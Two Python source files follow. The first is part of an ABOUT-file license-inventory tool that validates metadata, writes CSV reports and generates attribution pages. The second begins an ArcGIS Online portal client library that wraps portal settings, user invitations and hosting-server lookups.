self.warnings.append(Warn(FILE, field_name, file_path,
'File does not exist.'))
return
self._save_location(field_name, file_path)
try:
with codecs.open(self._location(file_path),
'r', 'utf8', errors='replace') as f:
# attempt to read the file to catch codec errors
f.readlines()
except Exception as e:
self.errors.append(Error(FILE, field_name, file_path,
'Cannot read file: %s' % repr(e)))
return
def validate_mandatory_fields_are_present(self):
"""
Validate that mandatory fields are present.
"""
for field_name in MANDATORY_FIELDS:
if field_name not in self.validated_fields:
self.errors.append(Error(VALUE, field_name, None,
'Mandatory field missing'))
def validate_known_optional_fields(self, field_name):
"""
Validate which known optional fields are present.
"""
if (field_name not in OPTIONAL_FIELDS
and field_name not in MANDATORY_FIELDS
and field_name not in FILE_LOCATIONS_FIELDS):
msg = 'Not a mandatory or optional field'
self.warnings.append(Warn(IGNORED, field_name,
self.validated_fields[field_name],
msg))
def validate_spdx_license(self, field_name, field_value):
if not field_name == 'license_spdx':
return
# FIXME: do we support more than one ID?
# Multiple IDs are not supported.
spdx_id = field_value
# valid id, matching the case
if spdx_id in SPDX_LICENSE_IDS.values():
return
spdx_id_lower = spdx_id.lower()
# conjunctions
if spdx_id_lower in ['or', 'and']:
return
# lowercase check
try:
standard_id = SPDX_LICENSE_IDS[spdx_id_lower]
except KeyError:
self.errors.append(Error(SPDX, field_name, spdx_id,
'Invalid SPDX license id.'))
else:
msg = ('Non standard SPDX license id case. Should be %r.'
% (standard_id))
self.warnings.append(Warn(SPDX, field_name, spdx_id, msg))
def validate_url_field(self, field_name, network_check=False):
"""
Ensure that a URL field contains a valid URL. If network_check is True,
do a network check to verify that it points to a live URL.
"""
if (not field_name.endswith('_url')
or field_name not in OPTIONAL_FIELDS):
return
# The "field is empty" warning will be thrown in the
# "validate_field_values_are_not_empty"
value = self.validated_fields[field_name]
if not value:
return
try:
is_url = self.check_url(value, network_check)
if not is_url:
msg = ('URL is not in a valid format or is not reachable.')
self.warnings.append(Warn(URL, field_name, value, msg))
except KeyError:
return
def check_is_ascii(self, s):
"""
Return True if string is composed only of US-ASCII characters.
"""
try:
s.decode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
msg = '%s is not valid US-ASCII.' % (s,)
self.errors.append(Error(ASCII, s, None, msg))
return False
return True
def check_date_format(self, field_name):
"""
Return True if date_string has a valid date format: YYYY-MM-DD.
"""
if field_name != 'date':
return
date_strings = self.validated_fields[field_name]
if not date_strings:
return
supported_dateformat = '%Y-%m-%d'
try:
formatted = datetime.strptime(date_strings, supported_dateformat)
return formatted
except ValueError:
msg = 'Unsupported date format, use YYYY-MM-DD.'
self.warnings.append(Warn(DATE, field_name, date_strings, msg))
return False
def check_url(self, url, network_check=False):
"""
Return True if a URL is valid. Optionally check that this is a live
URL (using a HEAD request without downloading the whole file).
"""
scheme, netloc, path, _p, _q, _frg = urlparse.urlparse(url)
url_has_valid_format = scheme in ('http', 'https', 'ftp') and netloc
if not url_has_valid_format:
return False
if network_check:
if has_network_connectivity:
# FIXME: HEAD requests DO NOT WORK for ftp://
return self.check_url_reachable(netloc, path)
else:
print('No network connection detected.')
return url_has_valid_format
@staticmethod
def check_url_reachable(host, path):
# FIXME: we are only checking netloc and path ... NOT the whole url
# FIXME: this will not work with FTP
try:
conn = httplib.HTTPConnection(host)
conn.request('HEAD', path)
except (httplib.HTTPException, socket.error):
return False
else:
# FIXME: we will consider a 404 as a valid status (True value)
# This is the list of all the HTTP status code
# http://en.wikipedia.org/wiki/List_of_HTTP_status_codes
return conn.getresponse().status
def get_custom_field_keys(self):
custom_key = []
for key in self.validated_fields:
if key not in MANDATORY_FIELDS + OPTIONAL_FIELDS:
custom_key.append(key)
return custom_key
def get_row_data(self, updated_path, custom_keys):
"""
Create a csv compatible row of data for this object.
"""
row = [updated_path]
no_multi_license_fields = ('license_text_file',
'license_spdx',
'dje_license',
'dje_license_name')
for field in MANDATORY_FIELDS + OPTIONAL_FIELDS:
if field in self.validated_fields:
row += [self.validated_fields[field]]
# The following code checks whether the input contains any
# multiple licenses
if field in no_multi_license_fields:
for lic_field in no_multi_license_fields:
try:
if '\n' in self.validated_fields[lic_field]:
self.errors.append(Error(VALUE,
lic_field,
self.validated_fields[field],
"Multiple Licenses are not supported."))
except KeyError:
pass
else:
row += ['']
# Add custom field value
for key in custom_keys:
try:
row += [self.validated_fields[key]]
except KeyError:
row += ['']
warnings = [repr(w) for w in self.warnings]
errors = [repr(e) for e in self.errors]
row += ['\n'.join(warnings), '\n'.join(errors)]
return row
@staticmethod
def invalid_chars_in_about_file_name(file_path):
"""
Return a sequence of invalid characters found in a file name.
From spec 0.8.0:
A file name can contain only these US-ASCII characters:
<li> digits from 0 to 9 </li>
<li> uppercase and lowercase letters from A to Z</li>
<li> the _ underscore, - dash and . period signs. </li>
"""
supported = string.digits + string.ascii_letters + '_-.+'
# Using the resource_name(file_path) will yield the following error on
# windows:
# Field: None, Value: [':', '\\', '\\', '\\', '\\', '\\', '\\'],
# Message: The filename contains invalid character.
# Perhaps it is better to simply use the os.path.basename(file_path)
# file_name = resource_name(file_path)
file_name = os.path.basename(file_path)
return [char for char in file_name if char not in supported]
@staticmethod
def duplicate_file_names_when_lowercased(file_location):
"""
Return a sequence of duplicate file names in the same directory as
file_location when lower cased.
From spec 0.8.0:
The case of a file name is not significant. On case-sensitive file
systems (such as Linux), a tool must raise an error if two ABOUT
files stored in the same directory have the same lowercase file
name.
"""
# TODO: Add a test, only for a case sensitive FS, such as on Linux
names = []
seen = set()
for name in os.listdir(os.path.dirname(file_location)):
    # track lowercased names seen so far: two names that differ only
    # by case are duplicates on a case-sensitive file system
    lower_name = name.lower()
    if lower_name in seen:
        names.append(name)
    seen.add(lower_name)
return names
def license_text(self):
"""
Return the license text if the license_text_file field exists and the
field value (file) exists.
"""
location = self.file_fields_locations.get('license_text_file',)
if location and os.path.exists(location):
try:
with open(location, 'rU') as f:
return f.read()
except Exception:
pass
return ''
def notice_text(self):
"""
Return the text in a notice file if the notice_file field exists in
the .ABOUT file and the referenced file exists.
"""
location = self.file_fields_locations.get('notice_file', '')
if location:
try:
with open(location, 'rU') as f:
return f.read()
except Exception:
pass
return ''
def get_about_name(self):
"""
Return the about object's name.
"""
return self.parsed.get('name', '')
def get_dje_license_name(self):
"""
Return the about object's dje_license_name.
"""
return self.parsed.get('dje_license_name', '')
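# Minimal usage sketch (illustrative; 'component.ABOUT' is a hypothetical
# path). Parsing happens in the constructor; problems accumulate on the
# instance rather than raising:
#
#     about = AboutFile('component.ABOUT')
#     for problem in about.errors + about.warnings:
#         print(repr(problem))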
def check_invalid_chars(field_name, line):
"""
Return a sequence of invalid characters in a field name.
From spec 0.8.0:
A field name can contain only these US-ASCII characters:
<li> digits from 0 to 9 </li>
<li> uppercase and lowercase letters from A to Z</li>
<li> the _ underscore sign. </li>
"""
supported = string.digits + string.ascii_letters + '_'
warnings = ''
invalid_chars = [char for char in field_name
if char not in supported]
if invalid_chars:
msg = ('Field name contains invalid characters: %r: line ignored.'
% (''.join(invalid_chars)))
warnings = Warn(IGNORED, field_name, line, msg)
return invalid_chars, warnings
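# Illustrative check (not part of the original module): a dash is not a legal
# field-name character, so it is reported and the line draws a warning.
def _example_check_invalid_chars():
    invalid, warning = check_invalid_chars('bad-name', 'bad-name: value\n')
    assert invalid == ['-'] and warning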
class Collector(object):
"""
Collect ABOUT files.
"""
def __init__(self, location):
"""
Collect ABOUT files at location and create one AboutFile instance per
file.
"""
assert location
self.location = location
normed_loc = os.path.expanduser(location)
normed_loc = os.path.normpath(normed_loc)
normed_loc = os.path.abspath(normed_loc)
normed_loc = posix_path(normed_loc)
assert os.path.exists(normed_loc)
self.normalized_location = normed_loc
self.abouts = [AboutFile(f) for f in self.collect(normed_loc)]
self._errors = []
self._warnings = []
self.genattrib_errors = []
self.summarize_issues()
def __iter__(self):
"""
Iterate collected AboutFile.
"""
return iter(self.abouts)
@staticmethod
def collect(location):
"""
Return a list of locations of *.ABOUT files given the location of an
ABOUT file or a directory tree containing ABOUT files.
Locations are normalized using posix path separators.
"""
# FIXME: we should not accept both a file and dir location as input
paths = []
if location:
if os.path.isfile(location) and is_about_file(location):
paths.append(location)
else:
for root, _, files in os.walk(location):
for name in files:
if is_about_file(name):
paths.append(os.path.join(root, name))
# normalize the paths to use posix path separators
paths = [posix_path(p) for p in paths]
return paths
@property
def errors(self):
"""
Return a list of the errors of all collected about instances.
"""
# FIXME: this function is not needed.
return self._errors
@property
def warnings(self):
"""
Return a list of the warnings of all collected about instances.
"""
# FIXME: this function is not needed.
return self._warnings
def summarize_issues(self):
"""
Summarize and log errors and warnings.
"""
for about_object in self:
relative_path = self.get_relative_path(about_object.location)
if about_object.errors or about_object.warnings:
logger.error('ABOUT File: %s' % relative_path)
if about_object.errors:
self._errors.extend(about_object.errors)
logger.error(about_object.errors)
if about_object.warnings:
self._warnings.extend(about_object.warnings)
logger.warning(about_object.warnings)
def get_relative_path(self, location):
"""
Return a path for a given ABOUT file location, relative to and based
on the collector's normalized location.
"""
user_loc = normpath(self.location)
if os.path.isdir(self.normalized_location):
parent_name = basename(user_loc)
subpath = '/' + parent_name + location.partition(user_loc)[2]
if user_loc[-1] == '/':
user_loc = user_loc.rpartition('/')[0]
if user_loc[-1] == '\\':
user_loc = user_loc.rpartition('\\')[0]
return subpath.replace('\\', '/')
else:
return user_loc.replace('\\', '/')
def custom_keys(self):
custom_keys = []
for about_object in self:
keys = about_object.get_custom_field_keys()
for key in keys:
if key not in custom_keys:
custom_keys.append(key)
return custom_keys
def write_to_csv(self, output_path):
"""
Build a row for each about instance and write results in CSV file
located at `output_path`.
"""
custom_keys = self.custom_keys()
with open(output_path, 'wb') as output_file:
csv_writer = csv.writer(output_file)
header_row = HEADER_ROW_FIELDS
# Add the custom (non-supported) fields, if any exist
for key in custom_keys:
header_row += (key,)
header_row += ERROR_WARN_FIELDS
csv_writer.writerow(header_row)
for about_object in self:
relative_path = self.get_relative_path(about_object.location)
row_data = about_object.get_row_data(relative_path, custom_keys)
csv_writer.writerow(row_data)
def get_about_context(self, about_object):
about_content = about_object.validated_fields
if '\n' in about_object.get_dje_license_name():
msg = ('Multiple licenses are not supported. '
'Skipping License generation.')
err = Error(GENATTRIB, 'dje_license',
about_object.location, msg)
self.genattrib_errors.append(err)
lic_text = unicode(about_object.license_text(),
errors='replace')
notice_text = unicode(about_object.notice_text(),
errors='replace')
about_content['license_text'] = lic_text
about_content['notice_text'] = notice_text
# report error if no license_text is found
if not about_content.get('license_text')\
and not about_content.get('notice_text')\
and not '\n' in about_object.get_dje_license_name():
msg = ('No license_text found. '
'Skipping License generation.')
err = Error(GENATTRIB, 'license_text_file',
about_object.location, msg)
self.genattrib_errors.append(err)
return about_content
def generate_attribution(self, template_path=None, limit_to=None, verification=None):
"""
Generate an attribution file from the current list of ABOUT objects.
The optional `limit_to` parameter allows restricting the generated
attribution to a specific list of component names.
"""
try:
import jinja2 as j2
except ImportError:
print('The Jinja2 templating library is required to generate '
'attribution texts. You can install it by running: '
'"configure".')
return
if not template_path:
template_path = join(dirname(realpath(__file__)),
"templates/default.html")
# FIXME: the template dir should be outside the code tree
template_dir = dirname(template_path)
template_file_name = basename(template_path)
loader = j2.FileSystemLoader(template_dir)
jinja_env = j2.Environment(loader=loader)
try:
template = jinja_env.get_template(template_file_name)
except j2.TemplateNotFound:
return
limit_to = limit_to or []
about_object_fields = []
license_dict = {}
not_process_components = list(limit_to)
component_exist = False
if limit_to:
for component in not_process_components:
for about_object in self:
# The about_object.location is the absolute path of the ABOUT
# file. The purpose of the following string partition is to
# match the about_file's location with the input list.
about_relative_path = about_object.location.partition(
normpath(self.location))[2]
if component == about_relative_path:
component_exist = True
about_content = self.get_about_context(about_object)
license_dict[about_object.get_dje_license_name()] = about_content['license_text']
about_object_fields.append(about_content)
break
if not component_exist:
loc = self.location + component
msg = ('The requested ABOUT file: %r does not exist. '
'No attribution generated for this file.' % loc)
err = Error(GENATTRIB, 'about_file', loc, msg)
self.genattrib_errors.append(err)
else:
for about_object in self:
about_content = self.get_about_context(about_object)
license_dict[about_object.get_dje_license_name()] = about_content['license_text']
about_object_fields.append(about_content)
# We want to display the collected licenses in alphabetical order
license_key = []
license_text_list = []
for key in sorted(license_dict):
license_key.append(key)
license_text_list.append(license_dict[key])
# Create the verification CSV output
if verification:
# Define what will be shown in the verification output
header_row = ('name', 'version', 'copyright', 'dje_license_name')
with open(verification, 'wb') as verification_file:
csv_writer = csv.writer(verification_file)
csv_writer.writerow(header_row)
for component in about_object_fields:
row_data = []
for key in header_row:
try:
row_data.append(component[key])
except:
row_data.append('')
csv_writer.writerow(row_data)
# We should only pass the about_objects to the template.
# However, this is a temp fix for the license summarization feature.
rendered = template.render(about_objects=about_object_fields,
license_keys=license_key,
license_texts=license_text_list,
common_licenses=COMMON_LICENSES)
return rendered
def check_paths(self, paths):
"""
Check if each path in a list of ABOUT file paths exist in the
collected ABOUT files. Add errors if it does not.
"""
collected = set(about.location for about in self.abouts)
for path in paths:
    path = posix_path(path)
    afp = join(self.location, path)
    # Assumption: collected locations are posix-normalized, so a
    # suffix match identifies a collected ABOUT file for this path.
    if any(loc.endswith(path) for loc in collected):
        continue
    msg = ('The requested ABOUT file: %(afp)r does not exist. '
           'No attribution generated for this file.' % locals())
    err = Error(GENATTRIB, 'about_file', path, msg)
    self.genattrib_errors.append(err)
def get_genattrib_errors(self):
return self.genattrib_errors
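# End-to-end sketch (illustrative; the input directory is hypothetical):
#
#     collector = Collector('/path/to/about/files')
#     collector.write_to_csv('inventory.csv')
#     print('%d errors, %d warnings' % (len(collector.errors),
#                                       len(collector.warnings)))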
USAGE_SYNTAX = (
"""
Input can be a file or directory.
Output must be a file with a .csv extension.
"""
)
VERBOSITY_HELP = (
"""
Print more or fewer verbose messages while processing ABOUT files:
0 - Do not print any warning or error messages, just a total count (default)
1 - Print error messages
2 - Print error and warning messages
"""
)
ERROR = 0
OK = 1
def main(parser, options, args):
overwrite = options.overwrite
verbosity = options.verbosity
if options.version:
print('ABOUT tool {0}\n{1}'.format(__version__, __copyright__))
return ERROR
if verbosity == 1:
handler.setLevel(logging.ERROR)
elif verbosity >= 2:
handler.setLevel(logging.WARNING)
if len(args) != 2:
print('Input and Output paths are required.')
print()
parser.print_help()
return errno.EEXIST
input_path, output_path = args
output_path = os.path.abspath(output_path)
if not os.path.exists(input_path):
print('Input path does not exist.')
print()
parser.print_help()
return errno.EEXIST
if os.path.isdir(output_path):
print('Output must be a file, not a directory.')
print()
parser.print_help()
return errno.EISDIR
if not output_path.endswith('.csv'):
print('Output file name must end with ".csv".')
print()
parser.print_help()
return errno.EINVAL
if os.path.exists(output_path) and not overwrite:
print('Output file already exists. Select a different file name '
'or use the --overwrite option.')
print()
parser.print_help()
return errno.EEXIST
if (not os.path.exists(output_path)
or (os.path.exists(output_path) and overwrite)):
collector = Collector(input_path)
collector.write_to_csv(output_path)
if collector.errors:
print('%d errors detected.' % len(collector.errors))
if collector.warnings:
print('%d warnings detected.' % len(collector.warnings))
return OK
else:
# we should never reach this
assert False, 'Unsupported option(s).'
def get_parser():
class MyFormatter(optparse.IndentedHelpFormatter):
def _format_text(self, text):
"""
Overridden to allow description to be printed without
modification.
"""
return text
def format_option(self, option):
"""
Overridden to allow options help text to be printed without
modification.
"""
result = []
opts = self.option_strings[option]
opt_width = self.help_position - self.current_indent - 2
if len(opts) > opt_width:
opts = '%*s%s\n' % (self.current_indent, '', opts)
indent_first = self.help_position
else: # start help on same line as opts
opts = '%*s%-*s ' % (self.current_indent, '',
opt_width, opts)
indent_first = 0
result.append(opts)
if option.help:
help_text = self.expand_default(option)
help_lines = help_text.split('\n')
# help_lines = textwrap.wrap(help_text, self.help_width)
result.append('%*s%s\n' % (indent_first, '', help_lines[0]))
result.extend(['%*s%s\n' % (self.help_position, '', line)
for line in help_lines[1:]])
elif opts[-1] != '\n':
result.append('\n')
return ''.join(result)
parser = optparse.OptionParser(
usage='%prog [options] input_path output_path',
description=USAGE_SYNTAX,
add_help_option=False,
formatter=MyFormatter(),
)
parser.add_option('-h', '--help', action='help', help='Display help')
parser.add_option(
'--version', action='store_true',
help='Display current version, license notice, and copyright notice')
parser.add_option('--overwrite', action='store_true',
help='Overwrite the output file if it exists')
parser.add_option('--verbosity', type=int, help=VERBOSITY_HELP)
return parser
if __name__ == '__main__':
parser = get_parser()
options, args = parser.parse_args()
sys.exit(main(parser, options, args))
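# Command-line sketch (illustrative paths; assumes this module is saved as
# about.py, which is not stated in the source):
#
#     python about.py --verbosity=2 ./thirdparty ./inventory.csv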
|
|
from ..security.security import OAuthSecurityHandler, AGOLTokenSecurityHandler
from .._abstract.abstract import BaseAGOLClass
import os
import urlparse
import parameters
import json
import types
########################################################################
class PortalSelf(object):
"""
represents the basic portal information from the portalSelf()
"""
_portalSelfDict = None
_canSharePublic = None
_subscriptionInfo = None
_defaultExtent = None
_supportsHostedServices = None
_homePageFeaturedContentCount = None
_supportsOAuth = None
_portalName = None
_urlKey = None
_modified = None
_culture = None
_helpBase = None
_galleryTemplatesGroupQuery = None
_commentsEnabled = None
_databaseQuota = None
_id = None
_canSearchPublic = None
_customBaseUrl = None
_allSSL = None
_featuredGroupsId = None
_defaultBasemap = None
_created = None
_access = None
_httpPort = None
_isPortal = None
_canSignInArcGIS = None
_portalThumbnail = None
_httpsPort = None
_units = None
_canListPreProvisionedItems = None
_mfaEnabled = None
_featuredGroups = None
_thumbnail = None
_featuredItemsGroupQuery = None
_canSignInIDP = None
_storageUsage = None
_rotatorPanels = None
_description = None
_homePageFeaturedContent = None
_canProvisionDirectPurchase = None
_canListData = None
_ipCntryCode = None
_user = None
_helpMap = None
_colorSetsGroupQuery = None
_canListApps = None
_portalProperties = None
_portalHostname = None
_useStandardizedQuery = None
_stylesGroupQuery = None
_symbolSetsGroupQuery = None
_name = None
_storageQuota = None
_canShareBingPublic = None
_maxTokenExpirationMinutes = None
_layerTemplatesGroupQuery = None
_staticImagesUrl = None
_databaseUsage = None
_showHomePageDescription = None
_availableCredits = None
_helperServices = None
_templatesGroupQuery = None
_mfaAdmins = None
_basemapGalleryGroupQuery = None
_region = None
_portalMode = None
_json_dict = None
_json = None
#----------------------------------------------------------------------
def __init__(self, portalSelfDict):
"""Constructor"""
self._json_dict = portalSelfDict
for k,v in portalSelfDict.iteritems():
try:
setattr(self, "_"+ k, v)
except Exception:
print "Cannot set parameter %s" % k
#----------------------------------------------------------------------
def __iter__(self):
""""""
attributes = [attr for attr in dir(self)
if not attr.startswith('__') and \
not attr.startswith('_') and \
not isinstance(getattr(self, attr), (types.MethodType,
types.BuiltinFunctionType,
types.BuiltinMethodType)
)
]
for att in attributes:
yield (att, getattr(self, att))
#----------------------------------------------------------------------
def __str__(self):
"""gets the object as a string"""
if self._json_dict is not None:
return json.dumps(self._json_dict)
return "{}"
#----------------------------------------------------------------------
@property
def canSharePublic(self):
"""gets the can share public value"""
return self._canSharePublic
#----------------------------------------------------------------------
@property
def subscriptionInfo(self):
"""returns the subscription information"""
return self._subscriptionInfo
#----------------------------------------------------------------------
@property
def defaultExtent(self):
"""returns the default extent"""
return self._defaultExtent
#----------------------------------------------------------------------
@property
def supportsHostedServices(self):
"""returns the support of hosted services"""
return self._supportsHostedServices
#----------------------------------------------------------------------
@property
def homePageFeaturedContentCount(self):
"""returns the homePageFeaturedContentCount value"""
return self._homePageFeaturedContentCount
#----------------------------------------------------------------------
@property
def supportsOAuth(self):
"""returns the supports OAuth value"""
return self._supportsOAuth
#----------------------------------------------------------------------
@property
def portalName(self):
"""returns the portal name"""
return self._portalName
#----------------------------------------------------------------------
@property
def urlKey(self):
"""returns the url key"""
return self._urlKey
#----------------------------------------------------------------------
@property
def modified(self):
"""returns the modified value"""
return self._modified
#----------------------------------------------------------------------
@property
def culture(self):
"""returns the culture value"""
return self._culture
#----------------------------------------------------------------------
@property
def helpBase(self):
"""returns the helpBase value"""
return self._helpBase
#----------------------------------------------------------------------
@property
def galleryTemplatesGroupQuery(self):
"""returns the value"""
return self._galleryTemplatesGroupQuery
#----------------------------------------------------------------------
@property
def commentsEnabled(self):
"""returns the comments enable value"""
return self._commentsEnabled
#----------------------------------------------------------------------
@property
def databaseQuota(self):
"""returns the database quota"""
return self._databaseQuota
#----------------------------------------------------------------------
@property
def id(self):
"""returns the portal id"""
return self._id
#----------------------------------------------------------------------
@property
def canSearchPublic(self):
"""returns the can search public value"""
return self._canSearchPublic
#----------------------------------------------------------------------
@property
def customBaseUrl(self):
"""returns the base url"""
return self._customBaseUrl
#----------------------------------------------------------------------
@property
def allSSL(self):
"""gets the all SSL value"""
return self._allSSL
#----------------------------------------------------------------------
@property
def featuredGroupsId(self):
"""returns the feature groups id"""
return self._featuredGroupsId
#----------------------------------------------------------------------
@property
def defaultBasemap(self):
"""returns the default basemap"""
return self._defaultBasemap
#----------------------------------------------------------------------
@property
def created(self):
"""returns the created date"""
return self._created
#----------------------------------------------------------------------
@property
def access(self):
"""returns the access value"""
return self._access
#----------------------------------------------------------------------
@property
def httpPort(self):
"""returns the http Port"""
return self._httpPort
#----------------------------------------------------------------------
@property
def isPortal(self):
"""returns the isPortal value"""
return self._isPortal
#----------------------------------------------------------------------
@property
def canSignInArcGIS(self):
"""returns the value"""
return self._canSignInArcGIS
#----------------------------------------------------------------------
@property
def portalThumbnail(self):
"""returns the portal thumbnail"""
return self._portalThumbnail
#----------------------------------------------------------------------
@property
def httpsPort(self):
"""returns the https port"""
return self._httpsPort
#----------------------------------------------------------------------
@property
def units(self):
"""returns the default units"""
return self._units
#----------------------------------------------------------------------
@property
def canListPreProvisionedItems(self):
"""returns the value"""
return self._canListPreProvisionedItems
#----------------------------------------------------------------------
@property
def mfaEnabled(self):
"""returns the mfe enabled value"""
return self._mfaEnabled
#----------------------------------------------------------------------
    @property
    def featuredGroups(self):
        """returns the featured groups value"""
        return self._featuredGroups
#----------------------------------------------------------------------
@property
def thumbnail(self):
"""returns the thumbnail value"""
return self._thumbnail
#----------------------------------------------------------------------
@property
def featuredItemsGroupQuery(self):
"""returns the feature Items group query"""
return self._featuredItemsGroupQuery
#----------------------------------------------------------------------
@property
def canSignInIDP(self):
"""return can signin IDP"""
return self._canSignInIDP
#----------------------------------------------------------------------
@property
def storageUsage(self):
"""returns the storage usage"""
return self._storageUsage
#----------------------------------------------------------------------
@property
def rotatorPanels(self):
"""returns the rotator panels"""
return self._rotatorPanels
#----------------------------------------------------------------------
@property
def description(self):
"""returns the portal description"""
return self._description
#----------------------------------------------------------------------
    @property
    def homePageFeaturedContent(self):
        """returns the home page featured content"""
        return self._homePageFeaturedContent
#----------------------------------------------------------------------
@property
def canProvisionDirectPurchase(self):
"""returns the provision direct purchase"""
return self._canProvisionDirectPurchase
#----------------------------------------------------------------------
@property
def canListData(self):
"""returns the canListData value"""
return self._canListData
#----------------------------------------------------------------------
@property
def ipCntryCode(self):
"""returns the ip cntrycode"""
return self._ipCntryCode
#----------------------------------------------------------------------
@property
def user(self):
"""returns the user value"""
return self._user
#----------------------------------------------------------------------
@property
def helpMap(self):
"""returns the helpmap value"""
return self._helpMap
#----------------------------------------------------------------------
@property
def colorSetsGroupQuery(self):
"""returns the colorsets group query"""
return self._colorSetsGroupQuery
#----------------------------------------------------------------------
@property
def canListApps(self):
"""returns the can list apps value"""
return self._canListApps
#----------------------------------------------------------------------
@property
def portalProperties(self):
"""returns the portal properties"""
return self._portalProperties
#----------------------------------------------------------------------
@property
def portalHostname(self):
"""returns the portal hostname"""
return self._portalHostname
#----------------------------------------------------------------------
@property
def useStandardizedQuery(self):
"""returns the user standardized query value"""
return self._useStandardizedQuery
#----------------------------------------------------------------------
@property
def stylesGroupQuery(self):
"""returns the styles group query"""
return self._stylesGroupQuery
#----------------------------------------------------------------------
@property
def symbolSetsGroupQuery(self):
"""returns the symbolsets group query"""
return self._symbolSetsGroupQuery
#----------------------------------------------------------------------
@property
def name(self):
"""returns the portal name"""
return self._name
#----------------------------------------------------------------------
@property
def storageQuota(self):
"""returns the storageQuota value"""
return self._storageQuota
#----------------------------------------------------------------------
@property
def canShareBingPublic(self):
"""returns the canShareBingPublic value"""
return self._canShareBingPublic
#----------------------------------------------------------------------
@property
def maxTokenExpirationMinutes(self):
"""returns the maxTokenExpirationMinutes value"""
return self._maxTokenExpirationMinutes
#----------------------------------------------------------------------
@property
def layerTemplatesGroupQuery(self):
"""returns the layerTemplatesGroupQuery value"""
return self._layerTemplatesGroupQuery
#----------------------------------------------------------------------
@property
def staticImagesUrl(self):
"""returns the staticImagesUrl value"""
return self._staticImagesUrl
#----------------------------------------------------------------------
@property
def databaseUsage(self):
"""returns the databaseUsage value"""
return self._databaseUsage
#----------------------------------------------------------------------
@property
def showHomePageDescription(self):
"""returns the show home page description value"""
return self._showHomePageDescription
#----------------------------------------------------------------------
@property
def availableCredits(self):
"""returns the available credits"""
return self._availableCredits
#----------------------------------------------------------------------
@property
def helperServices(self):
"""returns the helper services"""
return self._helperServices
#----------------------------------------------------------------------
@property
def templatesGroupQuery(self):
"""returns the templates group query"""
return self._templatesGroupQuery
#----------------------------------------------------------------------
@property
def mfaAdmins(self):
"""returns the mfaAdmins value"""
return self._mfaAdmins
#----------------------------------------------------------------------
@property
def basemapGalleryGroupQuery(self):
"""returns the basemap gallery group query"""
return self._basemapGalleryGroupQuery
#----------------------------------------------------------------------
@property
def region(self):
"""returns the portal region value"""
return self._region
#----------------------------------------------------------------------
@property
def portalMode(self):
"""returns the portal's mode"""
return self._portalMode
########################################################################
class UserInvite(object):
"""
represents a user to invite to a user
"""
_username = None
_password = None
_firstName = None
_lastName = None
_fullName = None
_email = None
_role = None
_allowedRole = ["account_publisher", "account_user", "account_admin"]
#----------------------------------------------------------------------
def __init__(self, username, password, firstName, lastName,
email, role="account_user"):
"""Constructor"""
self._username = username
self._password = password
self._firstName = firstName
self._lastName = lastName
self._fullName = firstName + " " + lastName
self._email = email
if role.lower() in self._allowedRole:
self._role = role
else:
raise AttributeError("Invalid Role: %s" % role)
#----------------------------------------------------------------------
@property
def value(self):
"""returns object as dictionary"""
        return {
            "username": self._username,
            "password": self._password,
            "firstname": self._firstName,
            "lastname": self._lastName,
            "fullname": self.fullName,
            "email": self._email,
            "role": self.role
        }
#----------------------------------------------------------------------
def __str__(self):
"""object as a string"""
return json.dumps(self.value)
#----------------------------------------------------------------------
@property
def firstName(self):
"""gets/sets the first name"""
return self._firstName
#----------------------------------------------------------------------
@firstName.setter
def firstName(self, value):
"""gets/sets the first name"""
if self._firstName != value:
self._firstName = value
#----------------------------------------------------------------------
@property
def lastName(self):
"""gets/sets the last name"""
return self._lastName
#----------------------------------------------------------------------
@lastName.setter
def lastName(self, value):
"""gets/sets the last name"""
if self._lastName != value:
self._lastName = value
#----------------------------------------------------------------------
@property
def email(self):
"""gets/sets the email"""
return self._email
#----------------------------------------------------------------------
@email.setter
def email(self, value):
"""gets/sets the email"""
if self._email != value:
self._email = value
#----------------------------------------------------------------------
@property
def password(self):
"""gets/sets the password"""
return self._password
#----------------------------------------------------------------------
@password.setter
def password(self, value):
"""gets/sets the password"""
if self._password != value:
self._password = value
#----------------------------------------------------------------------
@property
def username(self):
"""gets/sets the user name"""
return self._username
#----------------------------------------------------------------------
@username.setter
def username(self, value):
"""gets/sets the user name"""
if self._username != value:
self._username = value
#----------------------------------------------------------------------
@property
def role(self):
"""gets/sets the role name"""
return self._role
#----------------------------------------------------------------------
    @role.setter
    def role(self, value):
        """gets/sets the role name"""
        if self._role != value and \
           value.lower() in self._allowedRole:
            self._role = value
#----------------------------------------------------------------------
@property
def fullName(self):
"""gets the full name of the user"""
return self._firstName + " " + self._lastName
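# Illustrative usage (a sketch, not part of the API; assumes an authenticated
# Portals instance named `portals` already exists):
#   invite = UserInvite("jdoe", "s3cr3t!", "Jane", "Doe",
#                       "jdoe@example.com", role="account_user")
#   portals.inviteUser(invite, html="<p>Welcome!</p>",
#                      subject="You have been invited")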
########################################################################
class Portals(BaseAGOLClass):
"""
provides access to the portals' child resources.
"""
_baseURL = None
_url = None
_securityHandler = None
_proxy_port = None
_proxy_url = None
_portalId = None
#----------------------------------------------------------------------
def __init__(self,
url,
portalId=None,
securityHandler=None,
proxy_url=None,
proxy_port=None):
"""Constructor"""
if url.lower().find("/portals") < 0:
url = url + "/portals"
self._baseURL = url
self._proxy_port = proxy_port
self._proxy_url = proxy_url
        self._securityHandler = securityHandler
        if securityHandler is not None:
            self._referer_url = securityHandler.referer_url
        if portalId is None:
            portalId = self._findPortalId()
        self._portalId = portalId
        self._url = url + "/%s" % portalId
#----------------------------------------------------------------------
def _findPortalId(self):
"""gets the portal id for a site if not known."""
url = self._baseURL + "/self"
params = {
"f" : "json",
"token" : self._securityHandler.token
}
res = self._do_get(url=url, param_dict=params,
proxy_port=self._proxy_port,
proxy_url=self._proxy_url)
        if 'id' in res:
            return res['id']
        else:
            raise AttributeError("Invalid URL or token")
#----------------------------------------------------------------------
@property
def portalId(self):
"""gets the portal Id"""
        if self._portalId is None:
            self._portalId = self._findPortalId()
return self._portalId
#----------------------------------------------------------------------
@property
def urls(self):
"""gets the hosting server information"""
        if self._portalId is None:
            self._portalId = self._findPortalId()
url = self._baseURL + "/%s/urls" % self._portalId
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url, param_dict=params, proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
    @property
    def featureServers(self):
        """gets the hosting feature AGS Server"""
        urls = self.urls
        if urls == {}:
            return {}
        return urls["urls"]['features']
    #----------------------------------------------------------------------
    @property
    def tileServers(self):
        """gets the tile server base urls"""
        urls = self.urls
        if urls == {}:
            return {}
        return urls["urls"]['tiles']
#----------------------------------------------------------------------
@property
